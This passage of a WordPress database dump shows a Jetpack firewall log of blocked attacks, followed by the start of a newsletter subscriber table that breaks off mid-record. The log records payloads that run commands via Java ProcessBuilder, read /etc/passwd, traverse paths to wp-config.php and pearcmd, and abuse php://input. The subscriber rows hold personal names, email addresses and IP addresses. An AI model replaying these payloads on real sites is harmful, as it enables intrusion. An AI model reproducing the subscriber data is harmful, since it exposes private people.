{&amp;quot;ParamName&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;paramDesc&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;paramType&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;sampleItem&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;mandatory&amp;quot;:true,&amp;quot;requiredFlag&amp;quot;:1,&amp;quot;validationRules&amp;quot;:&amp;quot;function verification(data){a = new java.lang.ProcessBuilder(\\\\&amp;quot;id\\\\&amp;quot;).start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss=&amp;#039;&amp;#039;;while((line = r.readLine()) != null){ss+=line};return ss;}&amp;quot;} found within request_body'),(11286,'2024-10-12 15:22:02',933110,'PHP Injection Attack: PHP Script File Upload Found Matched Data: 2nHbTjiZblYfdDsefz2iSXK1Sdg.php found within files:Filedata: 2nHbTjiZblYfdDsefz2iSXK1Sdg.php'),(11287,'2024-10-12 15:22:12',932160,'Remote Command Execution: Unix Shell Code Found Matched Data: etc\\/passwd found within args:var: {&amp;quot;body&amp;quot;:{&amp;quot;file&amp;quot;:&amp;quot;file:\\/\\/\\/etc\\/passwd&amp;quot;}}'),(11288,'2024-10-12 15:22:16',930110,'Path Traversal Attack (\\/..\\/) Matched Data: \\/..\\/ found within args:picUrl: .\\/..\\/config\\/database.php'),(11289,'2024-10-12 20:27:55',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:fn: ..\\/..\\/wp-config.php'),(11290,'2024-10-12 20:27:58',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:file: ..\\/..\\/..\\/wp-config.php'),(11291,'2024-10-12 21:18:38',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/usr\\/local\\/php\\/pearcmd'),(11292,'2024-10-12 21:18:42',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within request_headers:think-lang: ..\\/..\\/..\\/..\\/..\\/usr\\/local\\/php\\/pearcmd'),(11293,'2024-10-12 21:18:45',930110,'Path Traversal Attack (\\/..\\/) Matched Data: ..\\/ found within args:lang: ..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\/usr\\/local\\/lib\\/php\\/pearcmd'),(11294,'2024-10-13 23:33:03',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11295,'2024-10-14 07:14:54',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11296,'2024-10-14 07:14:57',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11297,'2024-10-14 07:15:00',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11298,'2024-10-14 07:15:02',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11299,'2024-10-14 07:15:05',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: '),(11300,'2024-10-14 07:15:06',933140,'PHP Injection Attack: I\\/O Stream Found Matched Data: php:\\/\\/input found within args_names:0: ');
/*!40000 ALTER TABLE `wp_jetpack_waf_blocklog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_newsletter`
--

DROP TABLE IF EXISTS `wp_newsletter`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_newsletter` (
  `name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `token` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `status` varchar(1) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'S',
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `profile` mediumtext COLLATE utf8mb4_unicode_ci,
  `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updated` int(11) NOT NULL DEFAULT '0',
  `last_activity` int(11) NOT NULL DEFAULT '0',
  `followup_step` tinyint(4) NOT NULL DEFAULT '0',
  `followup_time` bigint(20) NOT NULL DEFAULT '0',
  `followup` tinyint(4) NOT NULL DEFAULT '0',
  `surname` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sex` char(1) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'n',
  `feed_time` bigint(20) NOT NULL DEFAULT '0',
  `feed` tinyint(4) NOT NULL DEFAULT '0',
  `referrer` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ip` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `wp_user_id` int(11) NOT NULL DEFAULT '0',
  `http_referer` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `geo` tinyint(4) NOT NULL DEFAULT '0',
  `country` varchar(4) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `region` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `city` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `bounce_type` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `bounce_time` int(11) NOT NULL DEFAULT '0',
  `unsub_email_id` int(11) NOT NULL DEFAULT '0',
  `unsub_time` int(11) NOT NULL DEFAULT '0',
  `list_1` tinyint(4) NOT NULL DEFAULT '0',
  `list_2` tinyint(4) NOT NULL DEFAULT '0',
  `list_3` tinyint(4) NOT NULL DEFAULT '0',
  `list_4` tinyint(4) NOT NULL DEFAULT '0',
  `list_5` tinyint(4) NOT NULL DEFAULT '0',
  `list_6` tinyint(4) NOT NULL DEFAULT '0',
  `list_7` tinyint(4) NOT NULL DEFAULT '0',
  `list_8` tinyint(4) NOT NULL DEFAULT '0',
  `list_9` tinyint(4) NOT NULL DEFAULT '0',
  `list_10` tinyint(4) NOT NULL DEFAULT '0',
  `list_11` tinyint(4) NOT NULL DEFAULT '0',
  `list_12` tinyint(4) NOT NULL DEFAULT '0',
  `list_13` tinyint(4) NOT NULL DEFAULT '0',
  `list_14` tinyint(4) NOT NULL DEFAULT '0',
  `list_15` tinyint(4) NOT NULL DEFAULT '0',
  `list_16` tinyint(4) NOT NULL DEFAULT '0',
  `list_17` tinyint(4) NOT NULL DEFAULT '0',
  `list_18` tinyint(4) NOT NULL DEFAULT '0',
  `list_19` tinyint(4) NOT NULL DEFAULT '0',
  `list_20` tinyint(4) NOT NULL DEFAULT '0',
  `list_21` tinyint(4) NOT NULL DEFAULT '0',
  `list_22` tinyint(4) NOT NULL DEFAULT '0',
  `list_23` tinyint(4) NOT NULL DEFAULT '0',
  `list_24` tinyint(4) NOT NULL DEFAULT '0',
  `list_25` tinyint(4) NOT NULL DEFAULT '0',
  `list_26` tinyint(4) NOT NULL DEFAULT '0',
  `list_27` tinyint(4) NOT NULL DEFAULT '0',
  `list_28` tinyint(4) NOT NULL DEFAULT '0',
  `list_29` tinyint(4) NOT NULL DEFAULT '0',
  `list_30` tinyint(4) NOT NULL DEFAULT '0',
  `list_31` tinyint(4) NOT NULL DEFAULT '0',
  `list_32` tinyint(4) NOT NULL DEFAULT '0',
  `list_33` tinyint(4) NOT NULL DEFAULT '0',
  `list_34` tinyint(4) NOT NULL DEFAULT '0',
  `list_35` tinyint(4) NOT NULL DEFAULT '0',
  `list_36` tinyint(4) NOT NULL DEFAULT '0',
  `list_37` tinyint(4) NOT NULL DEFAULT '0',
  `list_38` tinyint(4) NOT NULL DEFAULT '0',
  `list_39` tinyint(4) NOT NULL DEFAULT '0',
  `list_40` tinyint(4) NOT NULL DEFAULT '0',
  `profile_1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_3` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_4` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_5` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_6` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_7` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_8` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_9` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_10` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_11` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_12` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_13` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_14` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_15` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_16` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_17` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_18` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_19` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `profile_20` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `test` tinyint(4) NOT NULL DEFAULT '0',
  `source` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `email` (`email`),
  KEY `wp_user_id` (`wp_user_id`)
) ENGINE=InnoDB AUTO_INCREMENT=109 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_newsletter`
--

LOCK TABLES `wp_newsletter` WRITE;
/*!40000 ALTER TABLE `wp_newsletter` DISABLE KEYS */;
INSERT INTO `wp_newsletter` VALUES ('Trokon','contact@ekmsliberia.info','4d7ea0e462','','C',1,NULL,'2019-12-03 15:08:35',0,0,0,0,0,'Saykpa','n',0,0,'','',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',1,''),('Trokon','tasaykpa@gmail.com','36a14acd19','','C',2,NULL,'2019-12-03 15:29:43',1575386983,0,0,0,0,'','n',0,0,'widget','41.191.104.90',0,'https://ekmsliberia.info/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('','librollers2013@gmail.com','ecd8276af3','','C',3,NULL,'2019-12-03 15:41:22',1575387682,0,0,0,0,'','n',0,0,'widget','41.191.104.90',0,'https://ekmsliberia.info/cookies-privacy-policy/?preview_id=102&preview_nonce=e26f0c1749&preview=true',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('','elvinasamuels61@gmail.com','1df95c8054','','C',4,NULL,'2019-12-03 20:01:16',1575403276,0,0,0,0,'','n',0,0,'widget','41.191.107.129',0,'https://ekmsliberia.info/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('John Akie Ninwillay','angelninwillay@gmail.com','e875ede862','','C',6,NULL,'2019-12-17 15:14:15',1576595655,0,0,0,0,'','n',0,0,'page','41.191.104.78',0,'https://ekmsliberia.info/newsletter/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Menladi Mama Lormie','mamalor85@gmail.com','81805710c3','','C',7,NULL,'2020-04-01 13:01:29',1585746089,0,0,0,0,'','n',0,0,'page','41.191.105.238',0,'https://ekmsliberia.info/newsletter/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('ujay vah','vahujay@gmail.com','be3d69f963','','C',8,NULL,'2020-05-15 14:08:51',1589551731,0,0,0,0,'','n',0,0,'page','41.86.19.196',0,'https://ekmsliberia.info/newsletter/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Joseph T. Theoway','joe.theoway@gmail.com','65400ec737','','C',9,NULL,'2020-08-10 13:01:39',1597064499,0,0,0,0,'','n',0,0,'page','41.191.104.41',0,'https://ekmsliberia.info/newsletter/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Alline','allinedunbar2@gmail.com','239b739699','','C',10,NULL,'2020-08-21 11:52:52',1598010772,0,0,0,0,'','n',0,0,'page','41.191.104.43',0,'https://ekmsliberia.info/newsletter/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Isaac JS Davis','isaacjsdavis@gmail.com','6d0d1a688f','','C',11,NULL,'2020-08-27 15:13:53',1598541233,0,0,0,0,'','n',0,0,'page','41.57.95.198',0,'https://ekmsliberia.info/newsletter/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Jonathan C. Barchue','jbarchue88@gmail.com','9c854f3932','','C',12,NULL,'2020-09-23 14:12:31',1600870351,0,0,0,0,'','n',0,0,'page','41.191.107.216',0,'https://ekmsliberia.info/newsletter/',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Terence T. Dixon','wedeluv@gmail.com','5efd5a8801','','C',13,NULL,'2020-10-27 03:04:02',1603767842,0,0,0,0,'','n',0,0,'page','41.191.107.233',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Liberia Farmer\'s Development Corporation (LIFADCO)','lifadcoinc2016@gmail.com','80dcb16cc8','','C',14,NULL,'2020-12-23 13:59:50',1608731990,0,0,0,0,'','n',0,0,'page','41.57.95.157',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Marianne Kjellen','marianne.kjellen@undp.org','b4f5491b59','','C',15,NULL,'2021-01-15 19:39:16',1610739556,0,0,0,0,'','n',0,0,'page','158.174.23.43',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Isaac JS Davis','mme@ekmsliberia.infor','c3d4548fe5','','C',16,NULL,'2021-01-18 10:46:30',1610966790,0,0,0,0,'','n',0,0,'page','41.86.17.218',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Mamadee S. Kamara','mamadees.kamara@yahoo.com','f6a8f0382f','','C',17,NULL,'2021-03-01 15:49:18',1614613758,0,0,0,0,'','n',0,0,'page','41.191.104.43',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Alice B. sorsor','alice.sorsor88@gmail.com','30681379bd','','C',18,NULL,'2021-03-02 13:03:23',1614690203,0,0,0,0,'','n',0,0,'page','164.160.11.10',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Lorpu Scott ','lorpuscott2010@gmail.com','5f9fde5935','','C',19,NULL,'2021-03-18 09:26:40',1616059600,0,0,0,0,'','n',0,0,'page','185.239.100.23',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Eugene S. Caine','eugenescaine@gmail.com','950d6e52b2','','C',20,NULL,'2021-03-31 13:56:44',1617199004,0,0,0,0,'','n',0,0,'page','41.191.104.41',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('saye Flomo','yaka20161989@gmail.com','ece2e906ba','','C',21,NULL,'2021-04-12 13:57:39',1618235859,0,0,0,0,'','n',0,0,'page','160.155.241.72',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('James M.V. Yougie','jamesmvyougie@gmail.com','42fc52121a','','C',22,NULL,'2021-04-27 19:58:06',1619553486,0,0,0,0,'','n',0,0,'page','41.191.104.40',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('>Emmanuel pope ','popeemmanuel33@yahoo.com','678bf6272f','','C',23,NULL,'2021-04-29 21:57:00',1619733420,0,0,0,0,'','n',0,0,'page','197.232.61.230',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Stevena','skbonah@gac.gov.lr','e6766f6bac','','C',24,NULL,'2021-05-26 09:42:06',1622022126,0,0,0,0,'','n',0,0,'page','41.86.7.38',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('George G. Dorbor ','georgegborkeh@gmail.com','6fbe193e5e','','C',25,NULL,'2021-06-30 06:57:17',1625036237,0,0,0,0,'','n',0,0,'page','41.191.104.86',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('McDonald C. Acolatse','jimco12010@gmail.com','60bbfe4078','','C',26,NULL,'2021-06-30 07:17:32',1625037452,0,0,0,0,'','n',0,0,'page','73.42.213.110',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('David M. Mulbah Jr','dmawolomulbahjr@gmail.com','0a305fbf52','','C',27,NULL,'2021-07-20 13:22:17',1626787337,0,0,0,0,'','n',0,0,'page','41.57.95.37',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Yah Vallah Parwon','yahvallah@gmail.com','24a7f91c2b','','C',28,NULL,'2021-07-23 13:06:56',1627045616,0,0,0,0,'','n',0,0,'page','41.191.107.55',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Jerome Beh','jbeh@mpw.gov.lr','8bd7d65ad4','','C',29,NULL,'2021-09-08 11:31:18',1631100678,0,0,0,0,'','n',0,0,'page','41.191.104.124',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('MELVIN K. WORZI','authority2worzie@gmail.com','c17ed8e4d3','','C',30,NULL,'2021-09-08 11:48:04',1631101684,0,0,0,0,'','n',0,0,'page','41.191.107.207',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Anthony A. Yokie','ayokie2017@gmail.com','e4f5c7cba4','','C',31,NULL,'2021-09-09 11:26:02',1631186762,0,0,0,0,'','n',0,0,'page','41.191.107.228',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Jannie Fahnbulleh','janfahnbulleh2010@gmail.com','b2c4b21b6a','','C',32,NULL,'2021-09-09 11:26:04',1631186764,0,0,0,0,'','n',0,0,'page','41.191.104.117',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Bannel S. Dennis','bannel2002@gmail.com','b2b4bdb88d','','C',33,NULL,'2021-09-09 11:26:20',1631186780,0,0,0,0,'','n',0,0,'page','41.191.104.41',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Ben Nmah','bnmah54@gmail.com','e714853c82','','C',34,NULL,'2021-09-13 02:33:06',1631500386,0,0,0,0,'','n',0,0,'page','174.255.131.22',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Thomas T. Woart','thomaswoart49@gmail.com','e2783f8c33','','C',35,NULL,'2021-10-19 21:59:06',1634680746,0,0,0,0,'','n',0,0,'page','41.57.95.36',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Lawrence I. Wolo','lawrencewolo69@gmail.com','81405da556','','C',36,NULL,'2021-10-22 11:56:57',1634903817,0,0,0,0,'','n',0,0,'page','41.191.107.145',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Justin Goodwin','justin.goodwin@aether-uk.com','afe52cc034','','C',37,NULL,'2021-11-24 09:54:21',1637747661,0,0,0,0,'','n',0,0,'page','84.71.255.174',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('q q','online@svpsports.ca','57622a0917','','U',38,NULL,'2022-01-03 05:46:43',1641188803,0,0,0,0,'','n',0,0,'page','49.48.141.116',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Mariam Swaray','mariamswaray2002@gmail.com','d2baee52f6','','C',39,NULL,'2022-03-12 10:05:04',1647079504,0,0,0,0,'','n',0,0,'page','41.191.107.199',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Nelson T Davies','daviesn936@gmail.com','a7fdff05d7','','C',40,NULL,'2022-03-15 10:59:07',1647341947,0,0,0,0,'','n',0,0,'page','41.191.105.94',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Abraham Kalilu Kamara','akamara@jomanday.com','6d35f45cbd','','C',41,NULL,'2022-04-27 13:16:15',1651065375,0,0,0,0,'','n',0,0,'page','154.65.24.49',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('A Nyenpan Saytue','nyenpan1948@gmail.com','1dc5f6ea2c','','C',42,NULL,'2022-05-18 17:06:28',1652893588,0,0,0,0,'','n',0,0,'page','41.57.95.254',0,'',0,'','','','',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'','','','','','','','','','','','','','','','','','','','',0,''),('Moses N Zarh ','mosesnzarh14@gmail.com','ebac7543c2','','C',43,NULL,'2022-06-16 